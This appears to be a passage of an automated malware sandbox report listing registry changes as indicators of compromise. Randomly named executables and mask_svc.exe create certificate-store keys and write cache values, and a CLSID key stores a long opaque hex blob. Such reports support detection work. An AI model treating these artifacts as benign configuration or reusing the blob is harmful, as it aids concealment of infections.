description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache Process not Found Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Ub5x4PDB1ffO3V76nVSdRb5L.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Ub5x4PDB1ffO3V76nVSdRb5L.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Ub5x4PDB1ffO3V76nVSdRb5L.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Ub5x4PDB1ffO3V76nVSdRb5L.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" mask_svc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs oYJ4oarMVlCEKSuYDbZ6GPPw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" oYJ4oarMVlCEKSuYDbZ6GPPw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" oYJ4oarMVlCEKSuYDbZ6GPPw.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1560" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nl.norton.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "448" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}\1 = "5636" svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\1 = 01000000000000000000000000000000000000010100000000000000000000000000000064650136363535303034343737383844444343373734343232343443433333373743430000568937b9e80509faad94ffc48f88d247df004d17ca900303000004040000ff00ff00b8b8000000000000404000000000000000000000000000000000000000000000000000000000000000000000101101000e11a5b40eb4bdc4ec99b94d81ec753c011a5350021d0815130c4d43020f00011b5442074552071b4e49074e640b1c734d020b014b2300072e24000000000000ae4b815dd36e8e60806e8e60806e8e603446e391846a8e603446e193f51b8e603446e0928d638e60bb0bd36286698e60bb0bd5649b748e60bb0bd465917e8e60891f65f3856b8e60806e8f61e20c8e6017a7d968836c8e6017a7d061806f8e6012a22f9f816f8e6017a7d263806f8e60383b0a0b826e8e606a00000000000000000000000000000000000000000000005015450064e28107b8495ccd6000000000000000f0f022022b090c0e00acac0000c8c80000000000d4f5210000101000000000808101000000101000000202000505020200000000050502020000000000b0b10100040400000000000202606101001010000000000010100000000000000010100000000000101000000000000000000010100000a0e647015c5c0000fcba47013c3c000000909101e0e1010000707101bcb10d00000000000000000000a0a10124220600f0c43501383800000000000000000000000000000000000000000000000000003005340194940000000000000000000000c0c000888a02000000000000000000000000000000000000000000000000002e5a111d0c740000802bab000010100000acac0000040400000000000000000000000000202000604e5c1605151561008a058f0000c0c0000090900000b0b000000000000000000000000000404000406e4a051515610000f0ec1c0000505101000a0a0000404101000000000000000000000000404000c0ee5e140515156100bcb10d0000707101000e0e00004a4b01000000000000000000000000404000406e49010f0d177300b0b00000008081010002020000585901000000000000000000000000404000406e5c010111630000e0e101000090910100020200005a5b01000000000000000000000000404000406e5c1709030c63002422060000a0a10100080800005c5d0100000000000000000000000040400042420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fb8b648f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f6434acb42c364e345b59182e5ba09450a19e5fa7b7a0d0d77b8e6554ccb42c54176f3a6e357a61c67105b44008dcfddf9e57bfd736398cffdd9e57bfd737a6ae579ca42697de579c34e6254be3f88cb42c343c27bd0574737b8a677e357a7b88cc27bd05d5f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f3ba2626000101000066e345b4687ae57bd8576119b8778946ac61b17e02b8f5404acb41c064e345b591ebb8b531faafe57bc93e8a1f9a0000444bb8f5404acb41c06423c045cf8b4bce010049f0464141fcfc0808fc0c101f41cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d801d930100444bb8b56423c045b5b34bcca6647bf10688fb7d01000fb8b564e345b45240f6f6e57bd82f88ef6901000fb8778946ac61cd8cd85a01000fb8f5404acb41c064e345b5a964b9010000c3a5e57bcb3c8a13960000444bb8f5404acb41c06423c045cf8baf2a010049f0464141fcfc0808fc42cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d807ef10000444bb8b56423c045b5b34bcca6647bf106885cdb00000fb8b564e345b451b5f6e57bd82f884fc800000fb8778946ac61cd8c38bb00000fb8f5404acb41c064e345b5a964bb030000c3a5e57b9a6d8a1b9e00000fb8f54064e57b9b6c8a159000000fb8f5464ccb41c460e57bc93e8afb7e0000444bb8b56423c045b40035f8444341fc42cccddff9e57be16e7e06b877814eac62b36350cccd90b6e57bf17e6b7a27c27bc94561ea3e89cb41c0817acb4d407b4bb8b56423c045b5b2447adb5c4e3fb8b564e345b4564469105b440066e57bd8576b13b8778946ac61b1601cb8f5404acb41c064e345b5915cba020000c3f0f3030f00000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b96e1cc5c748770d77b8a65476f3a6e357a61924f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bd95e4737b8a677e357a7b88cc27bd9545f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b9483ac5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b97e0cc5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f0000000000008c15031ec96df419010048c38eba853b01487bf78cc10da02401010041be3780c362a8c27bfe098807800000492aa38cc1889f701500beca070cec741800494acb371ea9c5b8133b1c01ebdf7cc5b858701c01ebc063c5b8f1d91c01ebc96ac5b83e151f01ebf251c5b8577c1f01ebfb58c5b89cb71f01ebec4fc5b8c5ee1f014cc7599ac34d8a67fdd9109f80000000444bb8bf4e49b8b314556ee3bd7c41cb43c247c045b59cacc04cbc576ac34632ea2e91aa0083bec9b64301324f7bf9fa1d4e5701b8b9010000e9a84302000fb8b54ac135986441010033cc38c2ce8943010101000089b4cca4540166e345b45864f1b9262600010100006669105b440066e57bd8576119b8778847ac62b27e02b8f5404acb41c064e345b591a0cf4483c74c8ef3bb212000010100000f105f400fb8bd6ce57ad957655b46ac69b97f6ae57af07c6d51ca7b9b1e6f5acb41c06424cbc5087471be3e88b63f2b389a2aa2894bc38875f5c800000f8c44c60100665f04a7ce550148c115b81c3901004cc53d906c4901004cc1b8660654014cc53598341101004cc1b04920550166eff578343f8b1d990000665f040f6754010f8b088c00004cc1c9601479c24c8a66ec579fb8a7524db8bb0c2bfaa47d40cb43c2874cbc996957a61c2071041c755501742be6b9080800e88d6207008b86eab3550148c5985d531a0189c568046dc64586c34385c64c8fc35327ea2799ab004cc78eeeb8520148c3586ab801000041beaf1008c34023a35e150089b494fd550166efb4e789520166efb49ef755010f101f0fb8f3780c5624cb8d3b77c5f27d64e345b598a1c737983411010048c3458267ddf9b8b66727c88d0a46c5c44b64e345b59aa7c34632ea60dda800ffeab20daa004cc73f906c49010048cb4b37f0101f66e5ff3a440248c5cd41748179894147020000b9bb020000482b9bb0c35c28ea318ca80048c35390cd45b4023ec34337ea368ba80048cd45b41c24c74c8fc35d9ec3432030439b0048c34034ea1aa7a80048c3586ab40d0000ffea5ce3aa0048cd45b441cafadb8d5201b8b901000048c317b81c39010048c337986441010048c307a824010100487bff249972030048c945dc1901005e039e8bc34034eabb09a70033f32b222169850400ccbf6615007c691500859015008e9b150097821500a0b51500a9bc1500cc0000000000000084cb6fc41bfa36eab905a9008545cf8bc6430100b9b40d000048c1d57804dfead16da9008545cf8b94110100b9b40d0000ffea8c30a90048c35390cd45cf8b8c09010048c34337ea299ba7004cc75390cd45cf8b77f3000048c34320f8e708007a45b45762f9bc04000049c2589bc34023c3d7030000ea50eca90048c3d7780413f388cb47eceb8ac24023392806007a45b45762f9bd05000049c2589bc340231407040000ea03bfa90048c3d7780413f388cb47eceb8ac240238a9805007a45b45762f9be06000049c2589bc340232536040000eaf24fa80048c3d7780413f388cb47eceb8ac240231b0905007a45b45762f9bf07000049c2589bc340237665040000eaad10a80048c3d7780413f388cb47eceb8ac24023fce30800bbcf4b89c2589bc340239e8d040000ea8538a80048c3d7780413f388cb47eceb40be30323e01324f7bf9fa34635301ffea7ac7a80048c3d7780413f388cb47eceb0f00008c171fcb6fdc03cc38c2336750010101000033e15bb43f50530141f970c8000089b4cfa3500148c5802e725001c7c21044500101010000c7c2aa913f01f4f50100e8926f150033e19ac580dc80500141f970c80000e88e73150048c1d57864d078d3c501007ebc90fc5001e8eb03000f811c920000487104f99451017402105f04f69b510174190b5f04afc350017410ddb9080800e81ef503008b86752950014cc1807428500189c568046cc1889bce510148c34380c598d1d3160148c35327eaae1ca7004cc78e7124510148c3586ab801000041beaf1008c340233cc5110089b40f63500166efb45e33510166efb4117d5001b94df5010089b4204c50018984e6d63c01ebed8d86eede3c01ffeae859a4003904127f51010f8ac4be0000b7c3d7786473f349b41d70510148cb47f46f9c0f0000000000000000000000000084c184f4b64e0133f3030f000000000084cb6fc4abbeccbe4e0101c6c2e6ac4e010000000075687b69109b8400000000b94df50100ffea8031a40083bef7854e0101759855dd640000ffea9425a40033f388cb47eceb0f00000000000000000074b90100003beba57e438fc289c34e0100000000c30f00000000000000000000000000000000aa0069109b8400000000487336340d3501f287675a8900d17691363e000d8777f0318b8908d9f9de370000cc00008c131bcb6fcc68c352eafa36ea66d7a40048c34034ea77c6a400ffea79c8a40048c34372b30d04c088cb47e47b13b7da45c4a40048c1c5682c40cb6fd481ae170000e83b4695008545b473bebb020000cde461c580fece3c01e822cb010048c3cf601c70c18cdfe43f0148c5c9601c70cb43c840c18c6f543f0148c38ec6fd3f0148c18c31093c0148c3cf606408c18c3d063f01c7c20b333c01090d04c007c20d353c0101010000c7c2172f3c0101010000b8b00800004823abc048c58007373c01488fc30503020000b8b00800004823abc048c3864f71320148c1c5482498b00800004823abc149c3863806320148c1c5482468c5803c97a600e8e8ff0000b7cb47fcfb0f000084cb6fc491b1080000e8ee06000048cb47eceb0f45c5682c40cb6fc491ae170000e8047894008545b47c83cf6014bb4305e461c58006363c01e89a72000048c3cf600c60c18cf7cf3c0148c5c9600c60cb43c840c18c87bf3c0148c38edee63c0148c18c49703d01c7c2370e3d01090d04c007c229103d0101010000c7c2330a3d0101010000b8b00800004823abc048c58023123d018bdf701478c19d1549c58072daa500e8a6b00100b7cb47eceb0f84c1d57804771fcb6fac08c35226ea8c3ba20048c33043f8000048c5d9707418c3448a76f33fea9c2ba20048cd45b4467acbe7401c3848c5c1687c10c3df70741cc74380c1c568147cc74c8fc5c1684428c1c5680c1bfa81c1d57804dfea4ff8a20048c3d7784c20cb47841f9c0f00008c1305011fcb6fac08c35226ea3e89a20048c3384bf8000033ccba76f388c5d9704428c34531ea0cbba20048cd45b44d71cbe7401c3848c5c1684c20c3df70442cc74380c1c568147cc74d8ec5c1685438c1c5680c1bfa81c1d57804dfeaff4ba100ff38447cfd7ecdf9cb47841f0105980f0000257e940300cc000084cb6fc4ad57a64dba69eb755cab69eb75629579fb757eb2b901000048cb47eceb2bb25e0400ebeeedc32f04000fb97688cb47eceb8ac25b98cb47ecc1e60f00004dc845cf9a5489cb47ecc1c52d010048c1d5782c40c1fd503458c1f5580461171ecb6fcc68c379bec77ac2fa2126ca04008444b57234f32901e80000e8a64d03008a5250cc606400f7b682bed3d13e0100747eb3be070000e8fa1a0800c7c2dde73e0101010000e87b9003008444b4138faa4b090048c5808a8e0900e83ad40600e87996070048c580979d0700e829c70600e844ab070048c59874c2a30048c5803799a300e851a31a008545b55cc1f01b03008444b45468c5980cbaa30048c58007a9a300e8c93b1a00c7c26e543e01020200004072cd7541233dd0050040c47bf08acbb10000179b74070048c35390cbbb3874506cc34320f21f05008444b46c50c39053c34023ab4a09004cc74d7cb802000049c245312c2cfa1d273e01b8b901000048c3d7781478c3ff501c70c3f7586c00cb47e4611f9d0f84c1d5782c40c1fd503c4f1fcb6fcc60ca7b7a8ee1da3f0133e85e45bf7b37f32bbbaf37418cd7ec3f01e8cd27020040ca7270cc601cbbbefaf93f0102767eb3be070000e803ed0600e8da3103008994ad8e3f01e8bf54030040ca4527ff12050033e192ca4426d93405008444cf9a5648488bc3d7781478c3ff506408cb47e47f9c0f0084c34f8cc1d1786cc5c95891d94058c1c1405e0116171ecb6fac09c27b7b71b6c77a7457a77a362c59723f017f7834f3295bb200008dcfbd7c7bf9765dc25eb600008b5351cd6014b545cf8b098d00004cc74d4d5c9ec245264b5e0200745351cd6014b545b4023ac74d4d5c9ec245267c6e0500745351cd6014b37cfe745eae45b5526bc74df5e19bc2452690820500b3c74df5e19bc245268b9e0200b3c74df5e19bc24526a64e0000857a8b71867cfc765f66c74d4d5c9ec24526a8bd0200745351cd6014b545b4675fc74d4d5c9ec24526c92100008b5351cd6014dbed35e852d57814bb488bc3d7785c30cb4784011f01019d0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c3969824a10049c2737379bac362a1cd5eae7088ce42eaf95ac340238b6407004cc74c4c5d9ec346322c9bc3d7781478c3e7481c70c3ff506408cb47e47f9c8bc1d5782c40c1fd5034471fcb6fcc69c273735192c37a7279fb7470edd73b04004cc74c4c589bc34586c3d7781478c3ff501c70cb47e47fb69e89010033000025b6471800cc00008c131bcb6fcc68c35232ca69c34023b14118008545b5675acb78048a72efba5a0800ebeeedc323080048c3402347b7180048cd45b4a19dcb47e47b988bcb6fc4c0db390a008545b455442dc38f211530000048c3c340e3ee4d73f3bc6027f330b847bebc81b03d01759bdcf288cb47eceb73b1ea1c3b000084cb6fc4c01ffe09008545b473eff6160800ebf2f137d609008b4320986e1e008545b47036f22becef1fd62100b0b149cb47eceb8bcb6fc41bfa21a94001008444cf9a5588cb47eceb0f000084cb6fc4c0cf2b0c008444b57136f22bf9fa4a8527008444b572efcd290c00eb075cb149cb47eceb8bcb6fc4c073bc2700e8e6020c00b0b149cb47eceb0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc69c272b0c27b7b5192c36201b85909008545b5629478fa74675ac344272bc605004cc74df5e19ac34632289fc3df707cd3c7687418c3d7781478c3e7481c70c3ff506408cb47e47fb66a941700cc000084cb6fc4c0ef0e09008545b46458c5808dbb3a0148cb47ecc10ec32400e8be4d1b008545b570edd92a1b0048cb47eceb8bcb6fc41bfa21f936270048cb47ecc1799b0b0040131bcb6fcc2fb9b376483a01854c72ba0100000f4b874b8d66583a01e832dc0600e805e70a008444b57136f22bfffc60ae26008444b57c3afa21d93a0b00eb0160498bcb47e47b980f000084c1d5782c5d1dc367a4cb6faccb525a7af80e8821a60000e88b6b08008545b45fae5eae526fc580d5e23b01e8975b24008545b47036f22b9132c580d1e63b01e8834f24008545cf9b542b8c2fc39e8cb22a0149ca4b3774497bf94000008363df14e378b1489a1b847ff18ec5cca5acc5ccade71f55a5acc5ccb502fd1f5dbdff1e1478473b014cc5cca5acc5ccade71f55a5acc5ccb502fd1e1c784f3b01f2fd1f5dbdff1e14744b3b01f2fd1e1c74433b0148c3d7787418cb47841d9e7abc050000e8b45e0200cc00000084cb6ff454c74a79f5175a00665f3c08d624008a0c312b66459b2400b7c598e8272500b7c5811c91b8